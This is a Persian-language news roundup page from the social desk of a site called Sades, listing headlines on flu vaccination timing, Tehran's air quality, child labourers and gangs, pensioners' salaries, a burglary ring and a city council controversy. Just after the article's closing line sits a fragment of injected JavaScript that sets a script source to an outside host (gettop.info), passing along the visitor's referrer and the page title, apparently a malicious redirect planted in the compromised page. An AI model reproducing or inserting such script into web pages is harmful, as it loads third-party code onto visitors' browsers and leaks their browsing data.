سرخط مهم‌ترین‌ اخبار اجتماعی سادس در دومین روز مهر


بهترین زمان تزریق واکسن آنفلوآنزا، همکاری پنج درصد کودکان کار با باندها، واکنش محسن هاشمی به موضوع تبلت و خودروهای شورای شهر، زمان پرداخت پاداش بازنشستگان و… از جمله مهم‌ترین‌های تحریریه اجتماعی سادس در دومین روز مهر ماه بود.

به گزارش سادس، لینک مهم‌ترین‌ اخبار تحریریه اجتماعی سادس در زیر می‌آید و با کلیک بر روی هر یک از آنها می‌توانید به متن کامل آن دسترسی داشته باشید:

بهترین زمان تزریق واکسن آنفلوآنزا/اولویت واکسیناسیون با چه کسانی است؟

دکتر علی واشقانی فراهانی، رییس اداره بیولوژیک سازمان غذا و دارو ضمن ارائه توضیحاتی درباره تفاوت در برندهای مختلف واکسن آنفلوانزا، بهترین زمان تزریق واکسن آنفلوانزا را اواسط شهریور و اوایل مهرماه اعلام کرد.

وقت انجام کارهای بزرگ است/گوش شنوا داشته باشیم

دکتر سید حسن هاشمی، وزیر بهداشت با تاکید بر لزوم ادامه راه شهدا از سوی جامعه پزشکی گفت: کسانی که به فداکاری علاقه دارند، باید کاری کنند تا ساحت حوزه دارو و درمان به منش شهدا نزدیک‌تر باشد؛ چرا که شهدا چیزی به جز ادامه مسیرشان از ما انتظار ندارند.

تهرانی‌ها در تابستان، ۸۸ روز هوای سالم تنفس کردند

کیفیت هوای تهران در تابستانی که گذشت نسبت به سال‌های قبل بهتر بود و امید است که این وضعیت در پاییز هم تداوم داشته باشد.

به گزارش سادس، شهریور ماه امسال هوای پایتخت نسبت به چند سال اخیر از کیفیت بهتری برخوردار بود؛ به‌طوری‌که در آخرین فصل تابستان، تهران هیچ روزی هوای ناسالم نداشت و تمام ۳۱ روز این ماه هوای شهر سالم بود.

کمبود آب شیرین؛ چالش بزرگ تالاب میانکاله

شهرام فداکار، مدیرکل دفتر سواحل و تالاب‌های ساحلی سازمان حفاظت محیط زیست ضمن تاکید بر اینکه وضعیت خلیج گرگان و تالاب میانکاله به هیچ وجه بحرانی ارزیابی نمی‌شود، بر ضرورت مدیریت جامع حوضه آبخیز و رعایت حق‌آبه خلیج گرگان از آب شیرین بالادست تاکید کرد.

۵ درصد کودکان کار با باندها همکاری دارند/برخی دلال آسیب‌های اجتماعی هستند

بنابر اظهارات حبیب‌الله مسعودی فرید – معاون امور اجتماعی سازمان بهزیستی کشور، بیش از ۷۰ درصد کودکان کار و خیابان تهران غیرایرانی‌ هستند؛ این در حالیست که ۴ تا ۵ درصد کودکان کار با باندها همکاری دارند.

این شاخ و شانه دولتی برای چه کسی کشیده می‌شود؟

بهاره آروین، عضو هیات رئیسه شورای شهر تهران، ری و تجریش به طرح جمع آوری کودکان کار و خیابان واکنش نشان داد و به شهردار تهران در این خصوص تذکر داد.

حقوق شهریورماه بازنشستگان کشوری امشب واریز می‌شود

حسین بخشی‌زاده، مدیرکل امور مالی صندوق بازنشستگی کشوری گفت: حقوق شهریورماه بازنشستگان کشوری امشب (یکشنبه) به حساب این افراد واریز شده و قابل برداشت خواهد بود.

تدبیر آموزش و پرورش برای متقاضیان تاسیس «پیش دبستانی» که شرط سنی را ندارند

رخساره فضلی، مدیرکل دفتر آموزش پیش دبستانی وزارت آموزش و پرورش ضمن اعلام اینکه برای تمام موسسان مهدهای کودک و پیش دبستانی‌های متقاضی دریافت مجوز، از سوی آموزش و پرورش مجوز صادر شده است، گفت: برای موسسانی که شرط سنی لازم را نداشته باشند، مجوز موقت صادر خواهد شد.

برخورد با مزاحمان در اطراف مدارس

سردار حسین رحیمی، رییس پلیس پایتخت از برخورد با مزاحمان در اطراف مدارس خبر داد.

باند سرقت از خانه‌های لوکس تهران منهدم شد

رییس پلیس آگاهی پایتخت از انهدام باند سرقت از خانه‌های لوکس شمال تهران با میلیاردها تومان سرقت خبر داد.

واکنش محسن هاشمی به موضوع تبلت و خودروهای شورای شهر

رئیس شورای شهر تهران به موضوع خرید تبلت و خودرو برای اعضای شورای شهر واکنش نشان داد.

به گزارش سادس، پنج خبر پربازدید تحریریه اجتماعی سادس نیز در ادامه می‌آید که با کلیلک بر روی لینک آنها می‌توانید به متن خبر دسترسی داشته باشید:

کمبود آب شیرین؛ چالش بزرگ تالاب میانکاله

بهترین زمان تزریق واکسن آنفلوآنزا/اولویت واکسیناسیون با چه کسانی است؟

تعداد بیمارستان‌ها، داروخانه‌ها و مراکز ترک اعتیاد استان‌ها+ اینفوگرافی

مرگ زودرس در کمین افرادی که زیاد می‌نشینند

پرداخت پاداش بازنشستگان، به‌زودی/ تصویب و اعلام دستورالعمل جدید «اردو» ها طی روزهای آتی

انتهای پیام

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *